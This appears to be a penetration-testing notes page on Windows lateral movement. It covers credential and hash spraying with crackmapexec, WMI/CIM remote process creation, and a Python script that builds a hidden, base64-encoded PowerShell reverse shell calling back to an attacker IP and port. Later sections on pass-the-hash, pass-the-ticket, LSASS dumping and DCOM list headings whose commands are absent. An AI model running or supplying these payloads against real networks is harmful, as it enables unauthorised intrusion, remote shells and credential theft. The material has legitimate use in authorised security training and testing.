Lateral Movement

https://wadcoms.github.io/#

Spraying with crackmapexec

Try using username as a password and brute force with rockyou.txt Also use --local-auth intead of -d <domain>

Usernames and passwords:

crackmapexec smb <IP/SUBNET> -u users.txt -p passwords.txt -d <domain>
crackmapexec winrm <IP/SUBNET> -u users.txt -p passwords.txt -d <domain>
crackmapexec rdp <IP/SUBNET> -u users.txt -p passwords.txt --continue-on-success --rdp-timeout 30

Hashes

crackmapexec smb <IP/SUBNET> -u users.txt -hashes <HASH> -d <domain>
crackmapexec winrm <IP/SUBNET> -u users.txt -hashes <HASH> -d <domain>

WMI / WinRM (PORT 5985 / 5986)

WMI

With WMI we can create process on the target machine.

If ReturnValue = 0 the process has been created successfully.

wmic /node:<IP> /user:<USER> /password:<PASSWORD> process call create "calc"
PowerShell exploitation

Store the credentials in PSCredential object:

$username = '<USERNAME>';
$password = '<PASSWORD>';
$secureString = ConvertTo-SecureString $password -AsPlaintext -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString;

Create Common Information Model (CIM):

$options = New-CimSessionOption -Protocol DCOM
$session = New-Cimsession -ComputerName <IP> -Credential $credential -SessionOption $Options 
$command = 'calc';

Invoke Cim:

Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine =$Command};

You can call reverse shell instead of calc and update the $Command parameter.

Generate base64 encoded paylaod with python on kali machine:

import sys
import base64

payload = '$client = New-Object System.Net.Sockets.TCPClient("<IP>",<PORT>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'

cmd = "powershell -nop -w hidden -e " + base64.b64encode(payload.encode('utf16')[2:]).decode()

print(cmd)

WinRM

Can be used as non administrator.

There is also WinRM powershell alternative: WinRS

In order to use evil-winrm you need username and password of the user.

Copy

PsExec /wmiexec / smbexec (PORT 445)

User has to have Administrative rights. ADMIN$ share has to be present.

You can use psexec, smbexec if you have user credentials or NTLM hash. Any folder has to be writeable.

Credentials

Copy

Hash

Copy

Pass the Hash

Port 445 has to be enabled.

Pass the Hash method works only for NTLMv1

If we crack a password and/or can dump the SAM hashes, we can leverege both for lateral movement in networks.

Pass the password

You can pass the credentials to netexec and scan the network:

Pass the hash

You can pass the NTLM hash to netexec and scan the network in the same way as above:

More info

Use CME to dump valuable data:

Dump the LSA:

Check built in modules:

Dump the LSASS credentials (returns NTLM hash):

Netexec database:

Access the share:

Code execution

Overpass the hash

TGT can be used only on the machine we used it for.

Abuse an NTLM user hash to gain a full Kerberos TGT.

Generate kerberos ticket:

List Kerberos tickets:

Reuse the TGT:

Pass the ticket

No administrative privileges required.

Takes advantage of TGS which can be re-enjected elsewhere on the network. Method of taking someone else TGS and using it for our own session.

Export all tickets from the memory using mimikatz:

Verify tickets existence:

Use the exported ticket:

DCOM

Local Administrator access and PORT 135 is required.

Create DCOM instance:

Execute shell command:

Execute reverse shell encoded in base64:

PreviousActive Directory AuthenticationNextClient side attacks

Last updated